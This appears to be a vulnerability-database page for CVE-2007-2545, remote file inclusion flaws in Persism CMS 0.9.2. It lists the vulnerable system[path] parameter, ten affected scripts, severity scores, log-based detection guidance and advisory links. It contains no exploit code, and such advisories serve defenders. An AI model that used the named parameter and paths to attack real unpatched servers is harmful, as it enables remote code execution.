CVE-2007-2545
published 2007-05-09CVE-2007-2545: Multiple PHP remote file inclusion vulnerabilities in Persism CMS 0.9.2 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the…
PriorityP260high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
68.75%
99.3th percentile
Multiple PHP remote file inclusion vulnerabilities in Persism CMS 0.9.2 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the system[path] parameter to (1) blocks/headerfile.php, (2) files/blocks/latest_files.php, (3) filters/headerfile.php, (4) forums/blocks/latest_posts.php, (5) groups/headerfile.php, (6) links/blocks/links.php, (7) menu/headerfile.php, (8) news/blocks/latest_news.php, (9) settings/headerfile.php, or (10) users/headerfile.php, in modules/.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| persism_cms | persism_cms | <= 0.9.2 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect HTTP requests targeting any of the vulnerable PHP scripts with a user-supplied URL in the system[path] parameter, indicating remote file inclusion attempt. ↗
- →Monitor web server logs for GET/POST requests containing 'system[path]=' with an http:// or https:// value (remote URL) directed at any script under the /modules/ directory tree. ↗
- ·Exploitation requires the PHP 'allow_url_include' (or 'allow_url_fopen') directive to be enabled on the target server; installations with these disabled are not exploitable via this RFI vector. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://osvdb.org/37767http://osvdb.org/37768http://osvdb.org/37769http://osvdb.org/37770http://osvdb.org/37771http://osvdb.org/37772http://osvdb.org/37773http://osvdb.org/37774http://osvdb.org/37775http://osvdb.org/37776http://www.securityfocus.com/bid/23828http://www.vupen.com/english/advisories/2007/1671https://exchange.xforce.ibmcloud.com/vulnerabilities/34102https://www.exploit-db.com/exploits/3853http://osvdb.org/37767http://osvdb.org/37768http://osvdb.org/37769http://osvdb.org/37770http://osvdb.org/37771http://osvdb.org/37772http://osvdb.org/37773http://osvdb.org/37774http://osvdb.org/37775http://osvdb.org/37776http://www.securityfocus.com/bid/23828http://www.vupen.com/english/advisories/2007/1671https://exchange.xforce.ibmcloud.com/vulnerabilities/34102https://www.exploit-db.com/exploits/3853
2007-05-09
Published